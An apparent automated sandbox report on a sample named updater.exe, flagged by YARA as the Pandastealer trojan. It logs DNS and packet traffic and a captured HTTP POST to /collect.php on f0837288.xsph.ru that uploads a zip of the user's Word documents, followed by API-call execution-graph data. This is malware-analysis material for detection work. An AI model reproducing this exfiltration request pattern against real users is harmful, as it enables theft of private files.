                                Jul 4, 2023 11:12:03.308397055 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.308480978 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.308561087 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.308624029 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.308639050 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.308672905 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.308902025 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.308979034 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309067011 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309156895 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309220076 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309284925 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309428930 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309454918 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309477091 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309505939 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309535980 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309535980 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309609890 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309623003 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309670925 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309670925 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309767962 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.309833050 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.309943914 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310010910 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310096979 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310112000 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310163975 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310163975 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310267925 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310314894 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310427904 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310493946 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310604095 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310647011 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310683012 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310717106 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310807943 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310822010 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.310857058 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310879946 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.310976982 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311043024 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.311168909 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311269999 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.311294079 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311373949 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.311541080 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311554909 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311616898 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.311660051 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311738968 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.311810970 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311825991 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.311902046 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.311953068 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.312020063 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.312172890 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.312187910 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.312258959 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.312354088 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.312429905 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.312515020 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.312582970 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.312671900 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.312737942 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.312876940 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.312966108 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.312978029 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313020945 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313055038 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.313095093 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.313150883 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313211918 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.313318968 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313333988 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313425064 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.313502073 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313515902 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313591003 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.313697100 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313770056 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.313816071 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313894987 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.313895941 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.313987017 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:03.314027071 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.314174891 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.314189911 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.314357042 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.314521074 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.314687967 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.380580902 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.380693913 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.380811930 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.381047010 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.381069899 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.391207933 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.391251087 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.391458988 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.391474009 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.391669989 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.391819954 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.391921043 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.396697044 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.396739960 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.396771908 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.396792889 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.396904945 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397084951 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397123098 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397264004 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397279024 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397397995 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397448063 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397613049 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397627115 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397754908 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397794008 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397928953 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.397943974 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398098946 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398123980 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398256063 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398278952 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398318052 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398333073 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398458958 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398626089 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398641109 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398778915 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398940086 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.398967981 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399023056 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399142027 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399315119 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399509907 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399524927 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399658918 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399673939 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399806023 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399827957 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.399993896 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400173903 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400188923 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400204897 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400377989 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400428057 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400515079 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400540113 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400554895 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400636911 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400810957 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.400832891 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401052952 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401067972 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401148081 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401367903 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401381969 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401397943 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401498079 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401513100 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401659012 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.401859045 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402015924 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402245998 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402261972 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402276993 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402355909 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402371883 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402537107 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402717113 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402754068 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402869940 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.402894020 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403033018 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403204918 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403220892 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403363943 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403575897 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403743029 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403758049 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.403878927 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404074907 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404090881 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404227972 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404398918 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404413939 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404603958 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404742002 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404866934 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.404912949 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405075073 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405301094 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405317068 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405421019 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405596018 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405611038 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405786991 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405802011 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.405942917 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.406130075 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.406155109 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.406286001 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.406308889 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.406487942 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.406512022 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:03.406652927 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:04.566170931 CEST8049183141.8.192.151192.168.2.22
                                Jul 4, 2023 11:12:04.566397905 CEST4918380192.168.2.22141.8.192.151
                                Jul 4, 2023 11:12:05.087629080 CEST4918380192.168.2.22141.8.192.151
                                TimestampSource PortDest PortSource IPDest IP
                                Jul 4, 2023 11:12:02.199645996 CEST5010853192.168.2.228.8.8.8
                                Jul 4, 2023 11:12:02.282475948 CEST53501088.8.8.8192.168.2.22
                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                Jul 4, 2023 11:12:02.199645996 CEST192.168.2.228.8.8.80xcd88Standard query (0)f0837288.xsph.ruA (IP address)IN (0x0001)false
                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                Jul 4, 2023 11:12:02.282475948 CEST8.8.8.8192.168.2.220xcd88No error (0)f0837288.xsph.ru141.8.192.151A (IP address)IN (0x0001)false
                                • f0837288.xsph.ru
                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.2249183141.8.192.15180C:\Users\user\Desktop\updater.exe
                                TimestampkBytes transferredDirectionData
                                Jul 4, 2023 11:12:02.390363932 CEST0OUTPOST /collect.php HTTP/1.1
                                Content-Type: multipart/form-data; boundary=SendFileZIPBoundary
                                User-Agent: uploader
                                Host: f0837288.xsph.ru
                                Content-Length: 1661723
                                Connection: Keep-Alive
                                Cache-Control: no-cache
                                Jul 4, 2023 11:12:02.390427113 CEST0OUTData Raw: 2d 2d 53 65 6e 64 46 69 6c 65 5a 49 50 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 54 6f 55 70 6c 6f 61 64 22 3b 20 66 69 6c 65 6e 61
                                Data Ascii: --SendFileZIPBoundaryContent-Disposition: form-data; name="fileToUpload"; filename="zipfile.zip"Content-Type: application/zip
                                Jul 4, 2023 11:12:02.392108917 CEST2OUTData Raw: 50 4b 03 04 14 00 02 00 08 00 84 59 e4 56 25 e1 0c 9c 82 02 00 00 02 04 00 00 1b 00 11 00 46 69 6c 65 73 2f 41 6c 62 75 73 2f 47 49 47 49 59 54 46 46 59 54 2e 64 6f 63 78 55 54 0d 00 07 82 fe a3 64 82 fe a3 64 82 fe a3 64 0d 93 d9 91 45 21 08 44
                                Data Ascii: PKYV%Files/user/GIGIYTFFYT.docxUTdddE!D%*bLDvx(hW8}9T+HUT%=}0&.B/SkPR4h!/)~w"]FA_`&v$RPOPFZEoT?1f?~p0:f
                                Jul 4, 2023 11:12:02.480583906 CEST3OUTData Raw: 02 9a be e3 65 2f d9 b8 cd d9 88 bc 69 fc ad a8 0b cc 76 5f 6c f6 02 c0 8d 4b 7d ce bf e7 23 94 7b 44 5f d1 a7 7c eb 52 1b 7c a4 9e 17 0d 9b 5f 28 e1 8b a3 66 a3 7d 89 f1 f8 b4 5b bb 6d 6e 97 9d fe 7a 62 c1 57 ec ab 49 95 5a 5b 96 8f 72 56 83 f2
                                Data Ascii: e/iv_lK}#{D_|R|_(f}[mnzbWIZ[rV"u>'N+>Y]6=WMeLRhg0rirKE}XPPKYV%Files/user/(2) GIGIYTFFYT.docxUTdddE!D%*
                                Jul 4, 2023 11:12:02.481717110 CEST6OUTData Raw: 0a 5f d5 92 0e 94 53 3e c7 2f 8a 66 62 24 74 33 3c 53 70 68 45 6d d6 29 29 b5 6e 5e a4 d6 77 12 0a 54 f9 9c a3 8e ce b0 c2 a1 c8 e4 0d c1 55 f1 10 87 38 1f ab 9d 9c 90 03 a8 e4 5c ec dc cb de 49 c4 c2 b7 6d 08 60 f7 e4 4c df d3 a2 2d 5f 75 82 ef
                                Data Ascii: _S>/fb$t3<SphEm))n^wTU8\Im`L-_u$.lOf}l\7e2E<=8_{<Zz{`baD4.>5#j}i?K*Y*O"Q^orLav}xXKVk0n{PSj
                                Jul 4, 2023 11:12:02.570636034 CEST8OUTData Raw: ca b7 d8 92 c0 60 7e fc 52 c2 40 aa f9 1e 9b f1 b3 4d 7c 95 11 e6 98 56 f8 38 5d ec 88 69 79 f2 e1 94 19 1d 46 d5 cf 7c 13 28 23 9d 76 b2 fa 6e 2a d4 2c 2c 55 f6 8c f7 1d ab a3 de c7 4e 6d fc be 39 5a b3 c2 6c 8a 23 5b 2e 6b bf 36 5a 5b b7 ac 61
                                Data Ascii: `~R@M|V8]iyF|(#vn*,,UNm9Zl#[.k6Z[aQ^vF%?})fq2mN('AGc(X pmiQeeyKIo|,%vnaI(x}UkQLh=v2l^oYwwG
                                Jul 4, 2023 11:12:02.571310997 CEST11OUTData Raw: 7c 9b 6e ce f4 e6 ae 2f 22 8f 4e f2 6e f8 09 9f 2e ca 52 69 9f dd 5d 95 62 48 32 8b 8d b5 87 2e 4f 27 af b5 d3 d7 c6 b9 c2 e5 e3 c4 38 6a b9 aa 18 ba 7f b9 5d fa 7f ef 66 cc 18 f3 2c 46 9d bd 30 ce ad 30 26 3b 10 32 05 b6 b8 75 ce 0d f1 bd 1d be
                                Data Ascii: |n/"Nn.Ri]bH2.O'8j]f,F00&;2ush]1w\fBmG13e5|+aK'cN?xI(i5]\6oo<?PKYV? Files/user/(11) TQDF
                                Jul 4, 2023 11:12:02.571310997 CEST14OUTData Raw: 56 67 d3 a3 4a ec 54 34 86 91 c7 e4 3a bd d7 f2 33 02 3b 89 24 d9 85 36 b6 99 47 b4 93 62 ed b5 1c 9b 23 2f 08 f5 3a 8b a7 e7 a4 7d 55 b5 c4 24 f9 d5 b6 c3 ed d4 bf 3b fa 64 a6 77 41 9b 53 75 8c be 7b 1a a8 b3 48 7f 8f de 78 be 40 e4 57 8a 69 2e
                                Data Ascii: VgJT4:3;$6Gb#/:}U$;dwASu{Hx@Wi.}?fFZ8OUcm4*UU?W{C(ogaZErnEg+I;,y'(*Re#SCai;5"qFoEQ2OE-}djm=OBt/to)};,m-`
                                Jul 4, 2023 11:12:02.660753012 CEST19OUTData Raw: d8 56 0f 1b 65 f4 dd 2d 27 14 79 27 45 4b 0f e8 7e eb 9f 9d fc 18 e4 0b b3 69 f8 3e 7e 0a 1c ff 62 bb 56 7c b0 d4 1c c7 1c 1b c7 db ba 01 e3 ef 5a 84 d2 f0 ce 4b 8b 3e 72 1d f6 28 89 51 61 d3 72 5b b9 3f bc 77 4c 99 44 98 67 c5 ca f0 5f 91 91 26
                                Data Ascii: Ve-'y'EK~i>~bV|ZK>r(Qar[?wLDg_&832"gUC%)g`J(J ZO=ev=7nNNlta<$x65VEXC2<bJANqMa"K|^`b|
                                Jul 4, 2023 11:12:02.660852909 CEST21OUTData Raw: 4e 61 4b 1a 77 ba 36 a3 af 97 98 4e 28 db 20 a7 1f 90 09 6e 88 87 20 d9 cd ff d0 d9 01 32 56 20 9c 9e 38 50 6f ef b5 1d 57 29 1f e2 42 16 f8 2d 44 41 ec 51 eb 3a 43 12 92 ba 85 41 1c e8 25 b0 ec 38 79 03 8e 73 10 bd c6 7f d4 71 4c 2f 37 2a d3 14
                                Data Ascii: NaKw6N( n 2V 8PoW)B-DAQ:CA%8ysqL/7*`zhORt!@|0&6e~Pf~j#S^^[5;P!gF"FK5q[!A5Q#M9&$6w(Xa$sR%P;?1'0M]=Xw/
                                Jul 4, 2023 11:12:02.661106110 CEST24OUTData Raw: ea 9d 3a 38 2e 33 f9 84 72 6c ef bd 12 02 ec e7 71 a7 ab c6 e3 d1 49 6b 6a 3f 42 68 a7 4e c4 35 7c 79 dc 9c 31 e3 ad c4 7a a7 9c 87 a3 0c 87 c3 45 3a 72 52 d0 0f cb 27 a6 69 5f 7c ef fd 2f c8 92 b6 5f 22 d9 fd ec 4b 8c e3 4c ef 48 1f 38 ae cd 56
                                Data Ascii: :8.3rlqIkj?BhN5|y1zE:rR'i_|/_"KLH8VgI#q MpqlsY4]B-_\8[D,MOx<m-_m^QE~"-s(KwZIy,~W\i'NpF}-s)%_W8dnSK)
                                Jul 4, 2023 11:12:04.566170931 CEST1648INHTTP/1.1 200 OK
                                Server: openresty
                                Date: Tue, 04 Jul 2023 09:12:04 GMT
                                Content-Type: text/html; charset=UTF-8
                                Content-Length: 0
                                Connection: keep-alive


                                Click to jump to process

                                Click to jump to process

                                Click to dive into process behavior distribution

                                Target ID:1
                                Start time:11:12:02
                                Start date:04/07/2023
                                Path:C:\Users\user\Desktop\updater.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\updater.exe
                                Imagebase:0x13c0000
                                File size:698'280 bytes
                                MD5 hash:5B7111AE32C04C641C56E81A6293EC48
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                • Rule: Windows_Trojan_Pandastealer_8b333e76, Description: unknown, Source: 00000001.00000000.996893045.0000000001447000.00000002.00000001.01000000.00000003.sdmp, Author: unknown
                                Reputation:low

                                Reset < >

                                  Execution Graph

                                  Execution Coverage:10.8%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:11.5%
                                  Total number of Nodes:2000
                                  Total number of Limit Nodes:79
                                  execution_graph 56688 1430c90 56693 1430a66 56688->56693 56691 1430ccf 56694 1430a85 56693->56694 56695 1430a98 56694->56695 56699 1430aad 56694->56699 56703 1423529 18 API calls _Deallocate 56695->56703 56697 1430aa8 56697->56691 56700 143c45c 56697->56700 56699->56697 56704 1423529 18 API calls _Deallocate 56699->56704 56705 143be21 56700->56705 56702 143c477 56702->56691 56703->56697 56704->56697 56707 143be2d __wsopen_s 56705->56707 56706 143be34 56720 1423529 18 API calls _Deallocate 56706->56720 56707->56706 56708 143be5f 56707->56708 56712 143c3ee 56708->56712 56711 143be43 56711->56702 56713 143c410 56712->56713 56721 142af65 56713->56721 56716 143c424 56718 143c456 56716->56718 56751 1430123 56716->56751 56718->56711 56720->56711 56756 142adec 56721->56756 56723 142af7d 56723->56716 56724 143c47c 56723->56724 56777 143c1ca 56724->56777 56730 143c5a2 GetFileType 56733 143c5f4 56730->56733 56734 143c5ad GetLastError __dosmaperr CloseHandle 56730->56734 56731 143c4ae 56731->56716 56732 143c577 GetLastError __dosmaperr 56732->56731 56803 1438f59 SetStdHandle 56733->56803 56734->56731 56748 143c5e4 56734->56748 56735 143c525 56735->56730 56735->56732 56802 143c135 CreateFileW 56735->56802 56738 143c56a 56738->56730 56738->56732 56739 143c615 56740 143c661 56739->56740 56804 143c344 59 API calls 2 library calls 56739->56804 56742 143c668 56740->56742 56743 143c6a4 56740->56743 56805 14310e3 56742->56805 56743->56731 56745 143c720 CloseHandle 56743->56745 56820 143c135 CreateFileW 56745->56820 56747 143c74b 56747->56748 56749 143c755 GetLastError __dosmaperr 56747->56749 56748->56731 56821 1439121 SetStdHandle 56749->56821 56752 143012e HeapFree 56751->56752 56755 1430157 56751->56755 56753 1430143 56752->56753 56752->56755 56754 1430149 GetLastError 56753->56754 56754->56755 56755->56718 56757 142ae14 56756->56757 56758 142adfa 56756->56758 56760 142ae3a 56757->56760 56761 142ae1b 56757->56761 56771 142af9f HeapFree GetLastError _free 56758->56771 56773 143741f 56760->56773 56763 142ae04 56761->56763 56772 142afe0 5 API calls __wsopen_s 56761->56772 56763->56723 56765 142ae50 GetLastError __dosmaperr 56765->56763 56766 142ae76 56766->56763 56769 143741f __fassign MultiByteToWideChar 56766->56769 56767 142ae49 56767->56765 56767->56766 56776 142afe0 5 API calls __wsopen_s 56767->56776 56770 142ae8d 56769->56770 56770->56763 56770->56765 56771->56763 56772->56763 56774 1437430 MultiByteToWideChar 56773->56774 56774->56767 56776->56766 56778 143c205 56777->56778 56780 143c1eb 56777->56780 56822 